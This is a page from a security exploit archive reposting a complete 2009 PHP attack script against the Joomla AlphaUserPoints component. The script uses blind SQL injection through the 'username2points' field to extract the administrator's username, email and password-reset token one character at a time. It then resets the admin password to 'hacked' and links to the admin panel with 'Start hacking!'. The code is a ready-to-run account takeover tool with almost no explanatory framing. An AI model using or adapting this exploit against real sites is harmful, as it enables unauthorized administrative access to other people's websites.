首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Joomla Component AlphaUserPoints SQL Injection Exploit
来源:vfocus.net 作者:jdc 发布时间:2009-09-15  

<?php
 echo '<h2>Joomla Component AlphaUserPoints SQL Injection Exploit</h2>';
 echo '<h4>jdc 2009</h4>';
 echo '<fieldset><legend>Buffer</legend><div id="update" style="padding:8px;"></div></fieldset>';
 echo '<script type="text/javascript">var update = document.getElementById("update");</script>';
   ini_set( "memory_limit", "128M" );
   ini_set( "max_execution_time", 0 );
   set_time_limit( 0 );
   if( !isset( $_GET['url'] ) ) die( 'Usage: '.$_SERVER['SCRIPT_NAME'].'?url=www.victim.com' );
   $vulnerableFile = "http://".$_GET['url']."/components/com_alphauserpoints/assets/ajax/checkusername.php";
   $url = $vulnerableFile;
 $data = array();
 $admin = '';
 $data['username2points'] = "1' AND 1=2 UNION SELECT id FROM #__users WHERE gid=25 ORDER BY id ASC LIMIT 1 -- '";
 $output = getData();
 echo 'Cheching for exploit...';
 if( !testData( $output ) ) die( 'Failed. Target may have magic quotes on.' );
 echo 'done!<br />';
 if( isset( $_GET['check'] ) ) die( $output );
 echo 'Getting admin username & email (this may take some time)...';
 for( $i=1;$i<250;$i++ )
 {
     $len = strlen( $admin );
     $continue = FALSE;
   for( $j=32; $j<126; $j++ )
   {
       if( $continue ) continue;
       $data = array( 'username2points' => "1' AND 1=2 UNION SELECT id FROM #__users WHERE gid=25 AND ASCII(SUBSTRING(CONCAT(username,0x3a,email),$i,1)) = $j ORDER BY id ASC LIMIT 1 -- '" );
           $output = getData();
           if( testData( $output ) )
           {
             $admin .= chr( $j );
             echo '<script type="text/javascript">update.innerHTML += "'.chr( $j ).'";</script>';
             $continue = TRUE;
           }
           ob_end_flush();
           ob_flush();
           flush();
   }
   if( $len == strlen( $admin ) ) break;
 }
 if( strlen( $admin ) == 0 ) die( 'failed!' );
 echo '<script type="text/javascript">update.innerHTML = "";</script>';
 echo "done!<br />";
 echo "<h4>$admin</h4>";
 $admin = explode( ':', $admin );
 echo "<br />Generating token...";
 $url = "http://".$_GET['url']."/index.php?option=com_user&view=reset&tmpl=component";
 $data = array();
 $token = preg_replace( array( '/\n/', '/(?:.*)name="([a-f0-9]{32})"(?:.*)/m' ), array( '', '$1' ), getData() );
 if( strlen( $token ) != 32 ) die( 'failed!' );
 echo 'done!<br />';
 echo 'Resetting password...';
 $url = "http://".$_GET['url']."/index.php?option=com_user&amp;task=requestreset";
 $data = array( 'email' => $admin[1], $token => 1 );
 getData();
 echo 'done!<br />';
 echo 'Getting Reset Token...';
 $url = $vulnerableFile;
 $data = array();
 $activation = '';
 for( $i=1;$i<100;$i++ )
 {
     $len = strlen( $activation );
     $continue = FALSE;
   for( $j=48; $j<126; $j++ )
   {
       if( $continue ) continue;
       $data = array( 'username2points' => "1' AND 1=2 UNION SELECT id FROM #__users WHERE gid=25 AND ASCII(SUBSTRING(CONCAT(activation),$i,1)) = $j ORDER BY id ASC LIMIT 1 -- '" );
           $output = getData();
           if( testData( $output ) )
           {
             $activation .= chr( $j );
             echo '<script type="text/javascript">update.innerHTML += "'.chr( $j ).'";</script>';
             $continue = TRUE;
           }
           ob_end_flush();
           ob_flush();
           flush();
   }
   if( $len == strlen( $activation ) ) break;
 }
 if( strlen( $activation ) == 0 ) die( 'failed!' );
 echo 'done!<br />';
 echo 'Sending Reset Token...';
 $url = "http://".$_GET['url']."/index.php?option=com_user&view=reset&layout=complete";
 $data = array( 'token' => $activation, $token => 1 );
 getData();
 echo 'done!<br />';
 echo 'Resetting Password to "hacked"...';
 $url = "http://".$_GET['url']."/index.php?option=com_user&view=reset&layout=complete";
 $data = array( 'password1' => 'hacked', 'password2' => 'hacked', $token => 1 );
 getData();
 echo 'done!<br />';
 echo '<hr />';
 echo 'You may now log in as admin using the following credentials:<br />';
 echo '<strong>'.$admin[0].'</strong> / <strong>hacked</strong><br />';
 echo '<a href="http://'.$_GET['url'].'/administrator/">Start hacking!</a>';


 function shutUp( $buffer ) { return false; }
 function testData( $output ) { return preg_match( '/OK/', $output ); }
 function getData()
 {
   global $data, $url;
   ob_start( "shutUp" );
   $ch = curl_init();
   curl_setopt( $ch, CURL_TIMEOUT, 120 );
   curl_setopt( $ch, CURL_RETURNTRANSFER, 0 );
   curl_setopt( $ch, CURLOPT_URL, $url );
   curl_setopt( $ch, CURLOPT_COOKIEFILE, 'aup.cookie.txt' );
   curl_setopt( $ch, CURLOPT_COOKIEJAR, 'aup.cookie.txt' );
   if( count( $data ) > 0 )
   {
           curl_setopt( $ch, CURLOPT_POST, count( $data ) );
           curl_setopt( $ch, CURLOPT_POSTFIELDS, http_build_query( $data ) );
   }
   curl_setopt( $ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)" );
   curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, 1 );
   $result = curl_exec( $ch );
   curl_close( $ch );
   $return = ob_get_contents();
   ob_end_clean();
   return $return;
 }

/* jdc 2009 */
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Oracle Secure Backup Server 10
·Invisible Browsing 5.0.52 (.ib
·Mozilla Firefox < 3.0.14 Multi
·httpdx Web Server 1.4 (Host He
·Siemens Gigaset SE361 WLAN Rem
·Portable E.M Magic Morph 1.95b
·IBM AIX 5.6/6.1 _LIB_INIT_DBG
·Techlogica HTTP Server 1.03 Ar
·Kolibri+ Webserver 2 (GET Requ
·MP3 Studio 1.0 (.m3u File) Loc
·FreeRadius < 1.1.8 Remote Pack
·IPSwitch IMAP Server <= 9.20 R
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved